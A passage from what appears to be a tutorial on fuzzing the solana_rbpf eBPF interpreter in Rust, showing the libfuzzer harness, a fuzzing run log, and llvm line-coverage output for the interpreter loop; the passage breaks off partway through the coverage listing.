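fn crashes(prog: &[u8]) -> bool {
    let owned = prog.to_vec();
    panic::catch_unwind(move || fuzz_one(&owned)).is_err()
}
```

Here an empty program and a valid program both pass through `fuzz_one` silently, while `[0xFF]` is reported as a crash. A real fuzzer does not need `catch_unwind`; it is only used here to observe the panic without aborting the demonstration.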

Step 4: Put it together

Below is the final code for the fuzzer, including all of the bits I didn’t show above for concision.

#![feature(bench_black_box)]
#![no_main]

use std::collections::BTreeMap;
use std::hint::black_box;

use libfuzzer_sys::fuzz_target;

use solana_rbpf::{
    ebpf,
    elf::{register_bpf_function, Executable},
    memory_region::MemoryRegion,
    user_error::UserError,
    verifier::check,
    vm::{EbpfVm, SyscallRegistry, TestInstructionMeter},
};

use crate::common::ConfigTemplate;

mod common;

#[derive(arbitrary::Arbitrary, Debug)]
struct DumbFuzzData {
    template: ConfigTemplate,
    prog: Vec<u8>,
    mem: Vec<u8>,
}

fuzz_target!(|data: DumbFuzzData| {
    let prog = data.prog;
    let config = data.template.into();
    if check(&prog, &config).is_err() {
        // verify please
        return;
    }
    let mut mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
        &prog,
        None,
        config,
        SyscallRegistry::default(),
        bpf_functions,
    )
    .unwrap();
    let mem_region = MemoryRegion::new_writable(&mut mem, ebpf::MM_INPUT_START);
    let mut vm =
        EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![mem_region]).unwrap();

    drop(black_box(vm.execute_program_interpreted(
        &mut TestInstructionMeter { remaining: 1024 },
    )));
});

Theoretically, an up-to-date version is available in the rBPF repo.

Evaluation

$ cargo +nightly fuzz run dumb -- -max_total_time=300
... snip ...
#2902510	REDUCE cov: 1092 ft: 2147 corp: 724/58Kb lim: 4096 exec/s: 9675 rss: 355Mb L: 134/3126 MS: 3 ChangeBit-InsertByte-PersAutoDict- DE: "\x07\xff\xff3"-
#2902537	REDUCE cov: 1092 ft: 2147 corp: 724/58Kb lim: 4096 exec/s: 9675 rss: 355Mb L: 60/3126 MS: 2 ChangeBinInt-EraseBytes-
#2905608	REDUCE cov: 1092 ft: 2147 corp: 724/58Kb lim: 4096 exec/s: 9685 rss: 355Mb L: 101/3126 MS: 1 EraseBytes-
#2905770	NEW    cov: 1092 ft: 2155 corp: 725/58Kb lim: 4096 exec/s: 9685 rss: 355Mb L: 61/3126 MS: 2 ShuffleBytes-CrossOver-
#2906805	DONE   cov: 1092 ft: 2155 corp: 725/58Kb lim: 4096 exec/s: 9657 rss: 355Mb
Done 2906805 runs in 301 second(s)

After executing the fuzzer, we can evaluate its effectiveness at finding interesting inputs by checking its coverage after executing for a given time (note the use of the -max_total_time flag). In this case, I want to determine just how well it covers the function which handles interpreter execution. To do so, I issue the following commands:

$ cargo +nightly fuzz coverage dumb
$ rust-cov show -Xdemangler=rustfilt fuzz/target/x86_64-unknown-linux-gnu/release/dumb -instr-profile=fuzz/coverage/dumb/coverage.profdata -show-line-counts-or-regions -name=execute_program_interpreted_inner

Command output of rust-cov

If you’re not familiar with llvm coverage output, the first column is the line number, the second column is the number of times that that particular line was hit, and the third column is the code itself.

<solana_rbpf::vm::EbpfVm<solana_rbpf::user_error::UserError, solana_rbpf::vm::TestInstructionMeter>>::execute_program_interpreted_inner:
  709|    763|    fn execute_program_interpreted_inner(
  710|    763|        &mut self,
  711|    763|        instruction_meter: &mut I,
  712|    763|        initial_insn_count: u64,
  713|    763|        last_insn_count: &mut u64,
  714|    763|    ) -> ProgramResult<E> {
  715|    763|        // R1 points to beginning of input memory, R10 to the stack of the first frame
  716|    763|        let mut reg: [u64; 11] = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, self.stack.get_frame_ptr()];
  717|    763|        reg[1] = ebpf::MM_INPUT_START;
  718|    763|
  719|    763|        // Loop on instructions
  720|    763|        let config = self.executable.get_config();
  721|    763|        let mut next_pc: usize = self.executable.get_entrypoint_instruction_offset()?;
                                                                                                  ^0
  722|    763|        let mut remaining_insn_count = initial_insn_count;
  723|   136k|        while (next_pc + 1) * ebpf::INSN_SIZE <= self.program.len() {
  724|   135k|            *last_insn_count += 1;
  725|   135k|            let pc = next_pc;
  726|   135k|            next_pc += 1;
  727|   135k|            let mut instruction_width = 1;
  728|   135k|            let mut insn = ebpf::get_insn_unchecked(self.program, pc);
  729|   135k|            let dst = insn.dst as usize;
  730|   135k|            let src = insn.src as usize;
  731|   135k|
  732|   135k|            if config.enable_instruction_tracing {
  733|      0|                let mut state = [0u64; 12];
  734|      0|                state[0..11].copy_from_slice(&reg);
  735|      0|                state[11] = pc as u64;
  736|      0|                self.tracer.trace(state);
  737|   135k|            }
  738|       |
  739|   135k|            match insn.opc {
  740|   135k|                _ if dst == STACK_PTR_REG && config.dynamic_stack_frames => {
  741|    361|                    match insn.opc {
  742|     16|                        ebpf::SUB64_IMM => self.stack.resize_stack(-insn.imm),
  743|    345|                        ebpf::ADD64_IMM => self.stack.resize_stack(insn.imm),
  744|       |                        _ => {
  745|       |                            #[cfg(debug_assertions)]
  746|      0|                            unreachable!("unexpected insn on r11")
  747|       |                        }
  748|       |                    }
  749|       |                }
  750|       |
  751|       |                // BPF_LD class
  752|       |                // Since this pointer is constant, and since we already know it (ebpf::MM_INPUT_START), do not
  753|       |                // bother re-fetching it, just use ebpf::MM_INPUT_START already.
  754|       |                ebpf::LD_ABS_B   => {
  755|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  756|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                      ^0
  757|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  758|       |                },
  759|       |                ebpf::LD_ABS_H   =>  {
  760|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  761|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                      ^0
  762|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  763|       |                },
  764|       |                ebpf::LD_ABS_W   => {
  765|      2|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  766|      2|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                      ^0
  767|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  768|       |                },
  769|       |                ebpf::LD_ABS_DW  => {
  770|      4|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  771|      4|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                      ^0
  772|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  773|       |                },
  774|       |                ebpf::LD_IND_B   => {
  775|      2|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  776|      2|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                      ^0
  777|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  778|       |                },
  779|       |                ebpf::LD_IND_H   => {
  780|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  781|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                      ^0
  782|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  783|       |                },
  784|       |                ebpf::LD_IND_W   => {
  785|      7|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  786|      7|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                      ^0
  787|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  788|       |                },
  789|       |                ebpf::LD_IND_DW  => {
  790|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  791|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                      ^0
  792|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  793|       |                },
  794|       |
  795|      0|                ebpf::LD_DW_IMM  => {
  796|      0|                    ebpf::augment_lddw_unchecked(self.program, &mut insn);
  797|      0|                    instruction_width = 2;
  798|      0|                    next_pc += 1;
  799|      0|                    reg[dst] = insn.imm as u64;
  800|      0|                },
  801|       |
  802|       |                // BPF_LDX class
  803|       |                ebpf::LD_B_REG   => {
  804|     18|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  805|     18|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                      ^2
  806|      2|                    reg[dst] = unsafe { *host_ptr as u64 };
  807|       |                },
  808|       |                ebpf::LD_H_REG   => {
  809|     18|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  810|     18|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                      ^6
  811|      6|                    reg[dst] = unsafe { *host_ptr as u64 };
  812|       |                },
  813|       |                ebpf::LD_W_REG   => {
  814|    365|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  815|    365|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                      ^348
  816|    348|                    reg[dst] = unsafe { *host_ptr as u64 };
  817|       |                },
  818|       |                ebpf::LD_DW_REG  => {
  819|     15|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  820|     15|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                      ^5
  821|      5|                    reg[dst] = unsafe { *host_ptr as u64 };
  822|       |                },
  823|       |
  824|       |                // BPF_ST class
  825|       |                ebpf::ST_B_IMM   => {
  826|     26|                    let vm_addr = (reg[dst] as i64).wrapping_add( insn.off as i64) as u64;
  827|     26|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u8);
                                      ^20
  828|     20|                    unsafe { *host_ptr = insn.imm as u8 };
  829|       |                },
  830|       |                ebpf::ST_H_IMM   => {
  831|     23|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  832|     23|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u16);
                                      ^13
  833|     13|                    unsafe { *host_ptr = insn.imm as u16 };
  834|       |                },
  835|       |                ebpf::ST_W_IMM   => {
  836|     12|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  837|     12|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u32);
                                      ^5
  838|      5|                    unsafe { *host_ptr = insn.imm as u32 };
  839|       |                },
  840|       |                ebpf::ST_DW_IMM  => {
  841|     17|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  842|     17|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u64);
                                      ^11
  843|     11|                    unsafe { *host_ptr = insn.imm as u64 };
  844|       |                },
  845|       |
  846|       |                // BPF_STX class
  847|       |                ebpf::ST_B_REG   => {
  848|     17|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  849|     17|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u8);
                                      ^3
  850|      3|                    unsafe { *host_ptr = reg[src] as u8 };
  851|       |                },
  852|       |                ebpf::ST_H_REG   => {
  853|     13|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  854|     13|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u16);
                                      ^3
  855|      3|                    unsafe { *host_ptr = reg[src] as u16 };
  856|       |                },
  857|       |                ebpf::ST_W_REG   => {
  858|     19|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  859|     19|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u32);
                                      ^7
  860|      7|                    unsafe { *host_ptr = reg[src] as u32 };
  861|       |                },
  862|       |                ebpf::ST_DW_REG  => {
  863|      8|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  864|      8|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u64);
                                      ^2
  865|      2|                    unsafe { *host_ptr = reg[src] as u64 };
  866|       |                },
  867|       |
  868|       |                // BPF_ALU class
  869|  1.06k|                ebpf::ADD32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_add(insn.imm as i32)   as u64,
  870|    695|                ebpf::ADD32_REG  => reg[dst] = (reg[dst] as i32).wrapping_add(reg[src] as i32)   as u64,
  871|    710|                ebpf::SUB32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_sub(insn.imm as i32)   as u64,
  872|    345|                ebpf::SUB32_REG  => reg[dst] = (reg[dst] as i32).wrapping_sub(reg[src] as i32)   as u64,
  873|  1.03k|                ebpf::MUL32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_mul(insn.imm as i32)   as u64,
  874|  2.07k|                ebpf::MUL32_REG  => reg[dst] = (reg[dst] as i32).wrapping_mul(reg[src] as i32)   as u64,
  875|  1.03k|                ebpf::DIV32_IMM  => reg[dst] = (reg[dst] as u32 / insn.imm as u32)               as u64,
  876|       |                ebpf::DIV32_REG  => {
  877|      4|                    if reg[src] as u32 == 0 {
  878|      2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  879|      2|                    }
  880|      2|                    reg[dst] = (reg[dst] as u32 / reg[src] as u32) as u64;
  881|       |                },
  882|       |                ebpf::SDIV32_IMM  => {
  883|    346|                    if reg[dst] as i32 == i32::MIN && insn.imm == -1 {
                                                                    ^0
  884|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  885|    346|                    }
  886|    346|                    reg[dst] = (reg[dst] as i32 / insn.imm as i32) as u64;
  887|       |                }
  888|       |                ebpf::SDIV32_REG  => {
  889|     13|                    if reg[src] as i32 == 0 {
  890|      2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  891|     11|                    }
  892|     11|                    if reg[dst] as i32 == i32::MIN && reg[src] as i32 == -1 {
                                                                    ^0
  893|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  894|     11|                    }
  895|     11|                    reg[dst] = (reg[dst] as i32 / reg[src] as i32) as u64;
  896|       |                },
  897|    346|                ebpf::OR32_IMM   =>   reg[dst] = (reg[dst] as u32             | insn.imm as u32) as u64,
  898|    351|                ebpf::OR32_REG   =>   reg[dst] = (reg[dst] as u32             | reg[src] as u32) as u64,
  899|    345|                ebpf::AND32_IMM  =>   reg[dst] = (reg[dst] as u32             & insn.imm as u32) as u64,
  900|  1.03k|                ebpf::AND32_REG  =>   reg[dst] = (reg[dst] as u32             & reg[src] as u32) as u64,
  901|      0|                ebpf::LSH32_IMM  =>   reg[dst] = (reg[dst] as u32).wrapping_shl(insn.imm as u32) as u64,
  902|    369|                ebpf::LSH32_REG  =>   reg[dst] = (reg[dst] as u32).wrapping_shl(reg[src] as u32) as u64,
  903|      0|                ebpf::RSH32_IMM  =>   reg[dst] = (reg[dst] as u32).wrapping_shr(insn.imm as u32) as u64,
  904|    346|                ebpf::RSH32_REG  =>   reg[dst] = (reg[dst] as u32).wrapping_shr(reg[src] as u32) as u64,
  905|    690|                ebpf::NEG32      => { reg[dst] = (reg[dst] as i32).wrapping_neg()                as u64; reg[dst] &= u32::MAX as u64; },
  906|    347|                ebpf::MOD32_IMM  =>   reg[dst] = (reg[dst] as u32             % insn.imm as u32) as u64,
  907|       |                ebpf::MOD32_REG  => {
  908|      4|                    if reg[src] as u32 == 0 {
  909|      2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  910|      2|                    }
  911|      2|                                      reg[dst] = (reg[dst] as u32            % reg[src]  as u32) as u64;
  912|       |                },
  913|  1.04k|                ebpf::XOR32_IMM  =>   reg[dst] = (reg[dst] as u32            ^ insn.imm  as u32) as u64,
  914|  2.74k|                ebpf::XOR32_REG  =>   reg[dst] = (reg[dst] as u32            ^ reg[src]  as u32) as u64,
  915|    349|                ebpf::MOV32_IMM  =>   reg[dst] = insn.imm  as u32                                as u64,
  916|  1.03k|                ebpf::MOV32_REG  =>   reg[dst] = (reg[src] as u32)                               as u64,
  917|      0|                ebpf::ARSH32_IMM => { reg[dst] = (reg[dst] as i32).wrapping_shr(insn.imm as u32) as u64; reg[dst] &= u32::MAX as u64; },
  918|      2|                ebpf::ARSH32_REG => { reg[dst] = (reg[dst] as i32).wrapping_shr(reg[src] as u32) as u64; reg[dst] &= u32::MAX as u64; },
  919|      0|                ebpf::LE         => {
  920|      0|                    reg[dst] = match insn.imm {
  921|      0|                        16 => (reg[dst] as u16).to_le() as u64,
  922|      0|                        32 => (reg[dst] as u32).to_le() as u64,
  923|      0|                        64 =>  reg[dst].to_le(),
  924|       |                        _  => {
  925|      0|                            return Err(EbpfError::InvalidInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  926|       |                        }
  927|       |                    };
  928|       |                },
  929|      0|                ebpf::BE         => {
  930|      0|                    reg[dst] = match insn.imm {
  931|      0|                        16 => (reg[dst] as u16).to_be() as u64,
  932|      0|                        32 => (reg[dst] as u32).to_be() as u64,
  933|      0|                        64 =>  reg[dst].to_be(),
  934|       |                        _  => {
  935|      0|                            return Err(EbpfError::InvalidInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  936|       |                        }
  937|       |                    };
  938|       |                },
  939|       |
  940|       |                // BPF_ALU64 class
  941|    402|                ebpf::ADD64_IMM  => reg[dst] = reg[dst].wrapping_add(insn.imm as u64),
  942|    351|                ebpf::ADD64_REG  => reg[dst] = reg[dst].wrapping_add(reg[src]),
  943|  1.12k|                ebpf::SUB64_IMM  => reg[dst] = reg[dst].wrapping_sub(insn.imm as u64),
  944|    721|                ebpf::SUB64_REG  => reg[dst] = reg[dst].wrapping_sub(reg[src]),
  945|  3.06k|                ebpf::MUL64_IMM  => reg[dst] = reg[dst].wrapping_mul(insn.imm as u64),
  946|  1.71k|                ebpf::MUL64_REG  => reg[dst] = reg[dst].wrapping_mul(reg[src]),
  947|  1.39k|                ebpf::DIV64_IMM  => reg[dst] /= insn.imm as u64,
  948|       |                ebpf::DIV64_REG  => {
  949|     23|                    if reg[src] == 0 {
  950|     12|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  951|     11|                    }
  952|     11|                                    reg[dst] /= reg[src];
  953|       |                },
  954|       |                ebpf::SDIV64_IMM  => {
  955|  1.40k|                    if reg[dst] as i64 == i64::MIN && insn.imm == -1 {
                                                                    ^0
  956|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  957|  1.40k|                    }
  958|  1.40k|
  959|  1.40k|                    reg[dst] = (reg[dst] as i64 / insn.imm) as u64
  960|       |                }
  961|       |                ebpf::SDIV64_REG  => {
  962|     12|                    if reg[src] == 0 {
  963|      5|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  964|      7|                    }
  965|      7|                    if reg[dst] as i64 == i64::MIN && reg[src] as i64 == -1 {
                                                                    ^0
  966|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  967|      7|                    }
  968|      7|                    reg[dst] = (reg[dst] as i64 / reg[src] as i64) as u64;
  969|       |                },
  970|    838|                ebpf::OR64_IMM   => reg[dst] |=  insn.imm as u64,
  971|  1.37k|                ebpf::OR64_REG   => reg[dst] |=  reg[src],
  972|  2.14k|                ebpf::AND64_IMM  => reg[dst] &=  insn.imm as u64,
  973|  4.47k|                ebpf::AND64_REG  => reg[dst] &=  reg[src],
  974|      0|                ebpf::LSH64_IMM  => reg[dst] = reg[dst].wrapping_shl(insn.imm as u32),
  975|  1.73k|                ebpf::LSH64_REG  => reg[dst] = reg[dst].wrapping_shl(reg[src] as u32),
  976|      0|                ebpf::RSH64_IMM  => reg[dst] = reg[dst].wrapping_shr(insn.imm as u32),
  977|  1.03k|                ebpf::RSH64_REG  => reg[dst] = reg[dst].wrapping_shr(reg[src] as u32),
  978|  5.59k|                ebpf::NEG64      => reg[dst] = (reg[dst] as i64).wrapping_neg() as u64,
  979|  2.85k|                ebpf::MOD64_IMM  => reg[dst] %= insn.imm  as u64,
  980|       |                ebpf::MOD64_REG  => {
  981|      3|                    if reg[src] == 0 {
  982|      2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  983|      1|                    }
  984|      1|                                    reg[dst] %= reg[src];
  985|       |                },
  986|  2.28k|                ebpf::XOR64_IMM  => reg[dst] ^= insn.imm as u64,
  987|  1.41k|                ebpf::XOR64_REG  => reg[dst] ^= reg[src],
  988|    383|                ebpf::MOV64_IMM  => reg[dst] =  insn.imm as u64,
  989|  4.24k|                ebpf::MOV64_REG  => reg[dst] =  reg[src],
  990|      0|                ebpf::ARSH64_IMM => reg[dst] = (reg[dst] as i64).wrapping_shr(insn.imm as u32) as u64,
  991|    357|                ebpf::ARSH64_REG => reg[dst] = (reg[dst] as i64).wrapping_shr(reg[src] as u32) as u64,
  992|       |
  993|       |                // BPF_JMP class
  994|  4.43k|                ebpf::JA         =>                                          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
  995|     10|                ebpf::JEQ_IMM    => if  reg[dst] == insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^0
  996|  1.36k|                ebpf::JEQ_REG    => if  reg[dst] == reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.36k                                                        ^2
  997|  4.16k|                ebpf::JGT_IMM    => if  reg[dst] >  insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.42k                                                        ^2.74k
  998|  1.73k|                ebpf::JGT_REG    => if  reg[dst] >  reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.39k                                                        ^343
  999|    343|                ebpf::JGE_IMM    => if  reg[dst] >= insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^0
 1000|  2.04k|                ebpf::JGE_REG    => if  reg[dst] >= reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.70k                                                        ^342
 1001|  2.04k|                ebpf::JLT_IMM    => if  reg[dst] <  insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^2.04k                                                        ^1
 1002|    342|                ebpf::JLT_REG    => if  reg[dst] <  reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^0
 1003|  1.02k|                ebpf::JLE_IMM    => if  reg[dst] <= insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                                                                                         ^0
 1004|  2.38k|                ebpf::JLE_REG    => if  reg[dst] <= reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^2.38k                                                        ^1
 1005|  1.76k|                ebpf::JSET_IMM   => if  reg[dst] &  insn.imm as u64 != 0     { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.42k                                                        ^347
 1006|    686|                ebpf::JSET_REG   => if  reg[dst] &  reg[src]        != 0     { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^0
 1007|  6.48k|                ebpf::JNE_IMM    => if  reg[dst] != insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                                                                                         ^0
 1008|  2.44k|                ebpf::JNE_REG    => if  reg[dst] != reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.40k                                                        ^1.03k
 1009|  18.1k|                ebpf::JSGT_IMM   => if  reg[dst] as i64 >   insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^17.7k                                                        ^363
 1010|  2.08k|                ebpf::JSGT_REG   => if  reg[dst] as i64 >   reg[src]  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^2.07k                                                        ^12
 1011|  14.3k|                ebpf::JSGE_IMM   => if  reg[dst] as i64 >=  insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^12.9k                                                        ^1.37k
 1012|  3.45k|                ebpf::JSGE_REG   => if  reg[dst] as i64 >=  reg[src] as i64  { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^3.44k                                                        ^12
 1013|  1.36k|                ebpf::JSLT_IMM   => if (reg[dst] as i64) <  insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.02k                                                        ^346
 1014|      2|                ebpf::JSLT_REG   => if (reg[dst] as i64) <  reg[src] as i64  { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^0
 1015|  2.05k|                ebpf::JSLE_IMM   => if (reg[dst] as i64) <= insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^2.04k                                                        ^14
 1016|  6.83k|                ebpf::JSLE_REG   => if (reg[dst] as i64) <= reg[src] as i64  { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^6.83k                                                        ^7
 1017|       |
 1018|       |                ebpf::CALL_REG   => {
 1019|      0|                    let target_address = reg[insn.imm as usize];
 1020|      0|                    reg[ebpf::FRAME_PTR_REG] =
 1021|      0|                        self.stack.push(&reg[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS], next_pc)?;
 1022|      0|                    if target_address < self.program_vm_addr {
 1023|      0|                        return Err(EbpfError::CallOutsideTextSegment(pc + ebpf::ELF_INSN_DUMP_OFFSET, target_address / ebpf::INSN_SIZE as u64 * ebpf::INSN_SIZE as u64));
 1024|      0|                    }
 1025|      0|                    next_pc = self.check_pc(pc, (target_address - self.program_vm_addr) as usize / ebpf::INSN_SIZE)?;
 1026|       |                },
 1027|       |
 1028|       |                // Do not delegate the check to the verifier, since registered functions can be
 1029|       |                // changed after the program has been verified.
 1030|       |                ebpf::CALL_IMM => {
 1031|     22|                    let mut resolved = false;
 1032|     22|                    let (syscalls, calls) = if config.static_syscalls {
 1033|     22|                        (insn.src == 0, insn.src != 0)
 1034|       |                    } else {
 1035|      0|                        (true, true)
 1036|       |                    };
 1037|       |
 1038|     22|                    if syscalls {
 1039|      2|                        if let Some(syscall) = self.executable.get_syscall_registry().lookup_syscall(insn.imm as u32) {
                                                  ^0
 1040|      0|                            resolved = true;
 1041|      0|
 1042|      0|                            if config.enable_instruction_meter {
 1043|      0|                                let _ = instruction_meter.consume(*last_insn_count);
 1044|      0|                            }
 1045|      0|                            *last_insn_count = 0;
 1046|      0|                            let mut result: ProgramResult<E> = Ok(0);
 1047|      0|                            (unsafe { std::mem::transmute::<u64, SyscallFunction::<E, *mut u8>>(syscall.function) })(
 1048|      0|                                self.syscall_context_objects[SYSCALL_CONTEXT_OBJECTS_OFFSET + syscall.context_object_slot],
 1049|      0|                                reg[1],
 1050|      0|                                reg[2],
 1051|      0|                                reg[3],
 1052|      0|                                reg[4],
 1053|      0|                                reg[5],
 1054|      0|                                &self.memory_mapping,
 1055|      0|                                &mut result,
 1056|      0|                            );
 1057|      0|                            reg[0] = result?;
 1058|      0|                            if config.enable_instruction_meter {
 1059|      0|                                remaining_insn_count = instruction_meter.get_remaining();
 1060|      0|                            }
 1061|      2|                        }
 1062|     20|                    }
 1063|       |
 1064|     22|                    if calls {
 1065|     20|                        if let Some(target_pc) = self.executable.lookup_bpf_function(insn.imm as u32) {
                                                  ^0
 1066|      0|                            resolved = true;
 1067|       |
 1068|       |                            // make BPF to BPF call
 1069|      0|                            reg[ebpf::FRAME_PTR_REG] =
 1070|      0|                                self.stack.push(&reg[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS], next_pc)?;
 1071|      0|                            next_pc = self.check_pc(pc, target_pc)?;
 1072|     20|                        }
 1073|      2|                    }
 1074|       |
 1075|     22|                    if !resolved {
 1076|     22|                        if config.disable_unresolved_symbols_at_runtime {
 1077|      6|                            return Err(EbpfError::UnsupportedInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 1078|       |                        } else {
 1079|     16|                            self.executable.report_unresolved_symbol(pc)?;
 1080|       |                        }
 1081|      0|                    }
 1082|       |                }
 1083|       |
 1084|       |                ebpf::EXIT => {
 1085|     14|                    match self.stack.pop::<E>() {
 1086|      0|                        Ok((saved_reg, frame_ptr, ptr)) => {
 1087|      0|                            // Return from BPF to BPF call
 1088|      0|                            reg[ebpf::FIRST_SCRATCH_REG
 1089|      0|                                ..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS]
 1090|      0|                                .copy_from_slice(&saved_reg);
 1091|      0|                            reg[ebpf::FRAME_PTR_REG] = frame_ptr;
 1092|      0|                            next_pc = self.check_pc(pc, ptr)?;
 1093|       |                        }
 1094|       |                        _ => {
 1095|     14|                            return Ok(reg[0]);
 1096|       |                        }
 1097|       |                    }
 1098|       |                }
 1099|      0|                _ => return Err(EbpfError::UnsupportedInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET)),
 1100|       |            }
 1101|       |
 1102|   135k|            if config.enable_instruction_meter && *last_insn_count >= remaining_insn_count {
